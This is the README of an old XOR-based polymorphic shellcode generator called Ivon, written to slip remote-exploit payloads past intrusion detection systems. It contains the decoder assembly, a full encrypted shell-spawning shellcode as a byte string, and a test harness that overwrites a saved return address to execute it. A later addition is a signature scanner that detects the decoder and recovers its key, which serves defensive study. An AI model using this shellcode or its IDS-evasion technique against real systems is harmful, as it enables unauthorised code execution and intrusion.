----
Ivon v1.0 by Nono (2002)

Presentation
************

Ivon is an encrypted shellcode generator. It uses a 32-bit key to perform a
XOR. Polymorphic shellcodes are very easy to create. They are very useful to
pass through IDS for remote exploits. There are only 26 constant bytes in the
encrypted shellcode.

| Decoder + 32bits Key |... Encrypted Shellcode ...|
 <------- 31b ------->

The asm instructions for the decoder are:
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
        jmp .sbr
.begin:
        popl %ebx                       # address of the encrypted shellcode
        movl sizeof(shellcode),%ecx     # loop counter
        movl 32_bits_key ,%edx          # XOR key
.pc:
        movl (%ebx), %eax
        jcxz .shellcode                 # counter is 0: run the decoded shellcode
        xor %edx,%eax
        movl %eax,(%ebx)
        dec %ecx
        inc %ebx                        # advance by one byte
        jmp .pc
.sbr:
        call .begin                     # pushes the address of .shellcode
.shellcode:
        (beginning of the shellcode)
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

I am not an asm hacker, the code may not be optimized (the smallest possible).
If you find a smarter way to decode under shellcode constraints (don't forget
you execute code in the stack/bss), you can give me your solution.

The raw output is put in 'char decode[]'.

How to compile ?
****************

Very simple !
gcc -o ivon ivon.c

Warnings are just warnings.

How to use it ?
***************

nono@nono:~/ivon-1.0$ ./ivon
Ivon 1.0 by Nono - Creation of polymophic shellcode
Key of encryption (32bit in hex no 0): 0xff112204
Encryption of Alph1 shellcode with 0xff112204 key.
Size of new shellcode: 85
Shellcode:
\xeb\x18\x5b\x31\xc9\x83\xc1\x36\xba\x04\x22\x11\xff\x8b\x03\x67\xe3\x0d\x31\xd0\x89\x03\x49\x43\xeb\xf3\xe8\xe3\xff\xff\xff\x35\xe6\x06\x13\x78\xdf\x05\x48\x23\xd7\x96\x41\xbe\xc0\xf9\x08\x40\x8e\xcf\x41\x8e\xc4\x78\xc3\x41\x3b\x45\x86\xc0\x45\x9e\xc4\x05\x48\xf9\x13\x41\x10\x88\x05\x48\x20\x14\x37\x37\x37\xe7\xaa\xa1\xa6\xe7\xbb\xa0\xc8
nono@nono:~/ivon-1.0$

Ivon asks you for a key (32 bits) for the encryption. The key mustn't contain
0x00 because a shellcode can't have a \0 value (to be used in a strcpy
function). Moreover, the encrypted shellcode could contain \0 because of the
XOR operation: in that case, try another password. Then, the shellcode is
displayed on the screen.
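
A detection-side check for the layout described above, added here as an example (it is not part of Ivon or of the original README): it scans a buffer for the 26 constant decoder bytes, treating the size and key bytes as wildcards, and reports the key it finds. The function names and the filler bytes of the sample are assumptions; the decoder bytes are those of the sample output.

```c
#include <stdint.h>
#include <stdio.h>
#define STUB_LEN 31
#define ANY (-1)   /* wildcard: payload size (offset 7), key (offsets 9..12) */
/* Decoder bytes as printed in the sample output above. */
static const int16_t stub[STUB_LEN] = {
    0xeb,0x18,0x5b,0x31,0xc9,0x83,0xc1,ANY,0xba,ANY,ANY,ANY,ANY,0x8b,0x03,0x67,
    0xe3,0x0d,0x31,0xd0,0x89,0x03,0x49,0x43,0xeb,0xf3,0xe8,0xe3,0xff,0xff,0xff };
/* Constructed sample: filler, that decoder (size 0x36, key 0xff112204), filler. */
static const uint8_t sample[] = { 0x41,0x41,0x41,
    0xeb,0x18,0x5b,0x31,0xc9,0x83,0xc1,0x36,0xba,0x04,0x22,0x11,0xff,0x8b,0x03,0x67,
    0xe3,0x0d,0x31,0xd0,0x89,0x03,0x49,0x43,0xeb,0xf3,0xe8,0xe3,0xff,0xff,0xff,
    0x41,0x41,0x41,0x41 };
struct ivon_hit { size_t offset; uint8_t size; uint32_t key; uint8_t steady_xor; };

/* Number of signature bytes that are identical in every generated output. */
int ivon_constant_bytes(void)
{
    int n = 0;
    for (int i = 0; i < STUB_LEN; i++) n += stub[i] != ANY;
    return n;
}

/* Scan buf for the decoder; on a match fill *hit and return 1, else 0. */
int ivon_scan(const uint8_t *buf, size_t len, struct ivon_hit *hit)
{
    for (size_t off = 0; off + STUB_LEN <= len; off++) {
        size_t i = 0;
        while (i < STUB_LEN && (stub[i] == ANY || buf[off + i] == stub[i])) i++;
        if (i < STUB_LEN) continue;
        const uint8_t *k = buf + off + 9;          /* little-endian imm32 */
        hit->offset = off;
        hit->size = buf[off + 7];
        hit->key = k[0] | (uint32_t)k[1] << 8 | (uint32_t)k[2] << 16 | (uint32_t)k[3] << 24;
        /* 32-bit XOR, 1-byte step: payload bytes 3+ see all four key bytes. */
        hit->steady_xor = (uint8_t)(k[0] ^ k[1] ^ k[2] ^ k[3]);
        return 1;
    }
    return 0;
}

int main(void)
{
    struct ivon_hit h;
    if (!ivon_scan(sample, sizeof sample, &h)) return 1;
    printf("offset=%zu size=%u key=0x%08x xor=0x%02x\n", h.offset,
           (unsigned)h.size, (unsigned)h.key, (unsigned)h.steady_xor);
    return 0;
}
```

Because the decoder advances one byte per 32-bit XOR, every payload byte from the fourth on is XORed with the same single value, so the variable part is weaker cover than a 32-bit key suggests.
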

You can test your shellcode with the file 'testit.c':
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
/**
 * Test your own shellcode ;)
 */
char shellcode[]="\xeb\x18\x5b\x31\xc9\x83\xc1\x36\xba\x04\x22\x11\xff\x8b\x03\x67\xe3\x0d\x31\xd0\x89\x03\x49\x43\xeb\xf3\xe8\xe3\xff\xff\xff\x35\xe6\x06\x13\x78\xdf\x05\x48\x23\xd7\x96\x41\xbe\xc0\xf9\x08\x40\x8e\xcf\x41\x8e\xc4\x78\xc3\x41\x3b\x45\x86\xc0\x45\x9e\xc4\x05\x48\xf9\x13\x41\x10\x88\x05\x48\x20\x14\x37\x37\x37\xe7\xaa\xa1\xa6\xe7\xbb\xa0\xc8";

int main()
{
        int * ret;
        /* overwrite main's saved return address with the shellcode address */
        *((int*) &ret+2)= (int)shellcode;
        return (0);
}
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
nono@nono:~/ivon-1.0$ gcc -o testit testit.c
nono@nono:~/ivon-1.0$ ./testit
sh-2.05$

Command line option:
-k: to specify the key
ex:
nono@nono:~/ivon-1.0$ ./ivon -k eeff4455

Final
*****

If you find mistakes, bugs or you want to put comments, my email is:
pilon@iie.cnam.fr

EOF